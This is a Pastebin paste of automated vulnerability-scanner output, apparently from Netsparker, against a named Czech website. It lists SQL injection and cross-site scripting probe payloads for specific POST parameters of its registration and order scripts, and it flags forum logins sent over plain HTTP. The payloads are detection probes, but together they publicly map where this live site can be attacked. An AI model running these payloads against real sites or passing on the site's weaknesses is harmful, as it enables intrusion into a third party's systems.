Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [High Possibility] SQL Injection
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- http://www.formix.cz/skript/reg.php
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- http://www.formix.cz/skript/reg.php
- Parameter Name: email
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- http://www.formix.cz/skript/reg.php
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- http://www.formix.cz/skript/reg.php
- Parameter Name: email
- Parameter Type: Post
- Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
- http://www.formix.cz/skript/reg.php
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- http://www.formix.cz/skript/reg.php
- Parameter Name: kde
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- http://www.formix.cz/skript/reg.php
- Parameter Name: kde
- Parameter Type: Post
- Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- http://www.formix.cz/skript/reg.php
- Parameter Name: kde
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- http://www.formix.cz/skript/obj.php
- Parameter Name: licence
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- http://www.formix.cz/skript/obj.php
- Parameter Name: licence
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- http://www.formix.cz/skript/obj.php
- Parameter Name: platba
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- http://www.formix.cz/skript/obj.php
- Parameter Name: platba
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- http://www.formix.cz/skript/obj.php
- Parameter Name: licence
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- http://www.formix.cz/skript/obj.php
- Parameter Name: licence
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- http://www.formix.cz/skript/obj.php
- Parameter Name: platba
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- http://www.formix.cz/skript/obj.php
- Parameter Name: platba
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- http://www.formix.cz/skript/obj.php
- Parameter Name: licence
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- --------------------------------------------------------------------------------------------
- XSS
- Cross-site Scripting
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- http://www.formix.cz/skript/obj.php
- Parameter Name: email
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0001DC)</script>
- http://www.formix.cz/skript/obj.php
- Parameter Name: licence
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000269)</script>
- http://www.formix.cz/skript/obj.php
- Parameter Name: platba
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0002A8)</script>
- http://www.formix.cz/skript/obj.php
- Parameter Name: platba
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00031B)</script>
- http://www.formix.cz/skript/obj.php
- Parameter Name: licence
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000322)</script>
- http://www.formix.cz/skript/obj.php
- Parameter Name: licence
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000362)</script>
- http://www.formix.cz/skript/obj.php
- Parameter Name: email
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00037B)</script>
- http://www.formix.cz/skript/obj.php
- Parameter Name: email
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0003B2)</script>
- http://www.formix.cz/skript/obj.php
- Parameter Name: platba
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0003CD)</script>
- http://www.formix.cz/skript/obj.php
- Parameter Name: licence
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0003D1)</script>
- http://www.formix.cz/skript/obj.php
- Parameter Name: email
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00043B)</script>
- http://www.formix.cz/skript/obj.php
- Parameter Name: platba
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000470)</script>
- http://www.formix.cz/skript/obj.php
- Parameter Name: licence
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000475)</script>
- http://www.formix.cz/skript/obj.php
- Parameter Name: email
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0004DC)</script>
- --------------------------------------------------------------------------------------------
- [Possible] Cross-site Scripting
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Notes: This page responses with HTTP redirect status therefore detected XSS vulnerability
- might not be exploitable in many conditions however it still indicates lack of correct filtering and should be addressed.
- http://www.formix.cz/skript/reg.php
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>netsparker(0x0001A2)</script>
- http://www.formix.cz/skript/reg.php
- Parameter Name: email
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>netsparker(0x0001BD)</script>
- http://www.formix.cz/skript/reg.php
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>netsparker(0x0001CD)</script>
- http://www.formix.cz/skript/reg.php
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>netsparker(0x0001E5)</script>
- http://www.formix.cz/skript/reg.php
- Parameter Name: email
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>netsparker(0x0001F0)</script>
- http://www.formix.cz/skript/reg.php
- Parameter Name: kde
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>netsparker(0x000213)</script>
- http://www.formix.cz/skript/reg.php
- Parameter Name: kde
- Parameter Type: Post
- Attack Pattern: '><script>netsparker(9)</script>
- --------------------------------------------------------------------------------------------
- Password Transmitted Over HTTP
- Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
- http://www.formix.cz/forum/index.php
- Form target action: login.php
- http://www.formix.cz/forum/login.php
- Form target action: login.php
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement